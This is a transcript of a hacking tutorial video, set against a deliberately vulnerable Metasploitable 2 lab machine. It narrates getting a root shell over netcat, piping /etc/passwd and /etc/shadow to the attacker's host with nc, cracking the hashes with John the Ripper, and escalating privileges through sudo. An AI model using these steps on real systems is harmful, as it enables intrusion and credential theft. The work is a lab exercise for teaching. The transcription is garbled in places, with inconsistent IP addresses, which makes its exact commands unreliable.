morning everyone. Welcome to another video from Hashcat, and in today's video we are going to look into how to extract Linux hashes from another machine which we have compromised. So here I have a Metasploitable 2 distribution open. So if I ifconfig to find the IP address, I see it's 192.168.131.129. Now for the purposes of this tutorial, I will directly get a root shell here and I'll check that out using this netstat -a and tp, and here I would notice that grep 15 I have a 1524 open port, right? So what I'm gonna do here is I am just gonna first connect to this port and get a root shell. So let's say nc 192.168.31.129 on port 1524. So let's see what I get. I get a root.metasploitable shell. Now once you have successfully rooted a machine, you need to find the user ID and the passwords here. Now there are two important files here in Linux in order to find the user ID and password. If you remember the Windows tutorial that I have just shown in the previous video, you would know that there are files like security and SAM. Now the Linux counterpart of it is etc password and etc shadow. So let's see etc password. As you see, it is read and writable only by root, and the others can only read this but not write anything to it. The next important file here is cat etc shadow. Now as you see, etc shadow here has a lot of different things which you can read only as root. Now since I am root here, I can read that. Now if we see the permissions of etc shadow, you would see that it's only readable and writable by root or those in the same group, and apart from that no one has any other permissions to etc shadow. Now we need both these files in order to hack into the system. Now what I would do here is I would first open a netcat connection to my system at 1234 port, and I would try to send these files over the network to my distribution, to my Kali Linux distribution right here from this Metasploitable distribution that I have connected to. So what do I have to do in that case? The first thing I would do is I would use the echo command. Now if I look at echo etc password, I would cat etc password, I would see that this is the etc password, which tells me a lot of information about bin false, that is this is the default shell. Like these are not users in the system, these are applications, and thus they don't have a default shell. Bin bash are pretty much the users in the system, and I have 100, I have 1000 user ID here, and this X here is the hash that is stored here in etc password, etc shadow, sorry. So etc shadow has this hash which needs to be put here in these particular X's that's there, and here after this we will be able to crack these passwords here. So first thing I would do here is I would first try to cat etc password, and I would try to pipe it into nc 192.168.31.149 at 1234. This is the IP address of my host machine. Now once I do that, I would see that I get the connection from this particular place, from connection 2 here, that is my machine, from this Metasploitable machine, and here I get the entire etc password here. So now I would just simply copy this, and with a new terminal I would get it password, and here I would paste this, right? So I have the etc password file. The next thing I'm gonna do is I'm gonna cut this again, and now I'm gonna cat nc 192.168.31.129 1524, right? So now I'm gonna cat etc shadow, and I'm gonna pipe that right into nc 192.168 192.31.149.1234. Mind you, if you are having a problem in understanding why I am piping this and what does cat do and how does it pipe into Nmap, you need to see my previous videos, which has all the information about how this is particularly working. And there are also a ton of different ways where you can achieve this, but this is the easiest, and thence I am showing you because ncat is there present in most machines. So now as I cat etc shadow and I press an enter key, I would see that sorry, cat etc shadow right. As you see, even the etc shadow has been retrieved. Now, so once I've retrieved this etc shadow and etc password, I would again get it here and type shadow, and here I would paste this, right? So now I have saved both the etc password and the shadow file. So after that, you come to Kali Linux, you have something known as unshadow, right? So unshadow is a tool which uses the password file, that is the password, and the shadow file to generate a hash.txt, just the way we were using samdum2 in Windows cases to generate a hash file that will be used for our cracking tools like John the Ripper. So after placing this command unshadow password file shadow file hash.txt, I press an enter key, and now if I cat hash.txt, I would see that apart from the X, all the user accounts which has a password in them, like for instance root, the X has been replaced by the hash, and the rest of it is pretty much the same. So after this, I have an hash.txt file which I'll use John the Ripper to crack. So let's say John hash.txt, and as you see, using John, I was able to crack all the hashes like msfadmin service, Batman system, Postgres, and I was able to get the password of msfadmin and msfadmin. So after this, all I need to do in order to verify this is, let's say, SSH to this system 192.16 as msfadmin at the rate 2.168.31.129, I guess, 129. So let's say yes, let's say msfadmin, and here I am logged into the metasploitable system. Now I would also show you in this video a little bit about what privilege escalation is. Now as you see, I am here as the user msfadmin. So who am I? I am this particular user. Now if I try to cat etc password from here, I will not be shadow from here, I will not be able to. I was able to cat etc password because it is world readable, and like every user in the system can read it, but etc shadow can only be written by root, and hence I get a permission denied. Now how do I get to root? Now there are a million ways to escalate your privileges, but here the most basic and easy way is to check the sudo permissions. So if I do a sudo -l and if I give an msf password, I would see msfadmin has all the permissions here to run as sudo. So if I do sudo bin bash, I would have a bash shell as root, and that is all about sudo, and we'll explain sudo further in the next tutorials. I hope in this one you understood how to take the hashes from a Linux system, what etc password and etc shadow is, and finally be able to crack them using John the Ripper. So that's all for this video. I hope you enjoyed it. Tune into HackTubes for more such videos. Thank you.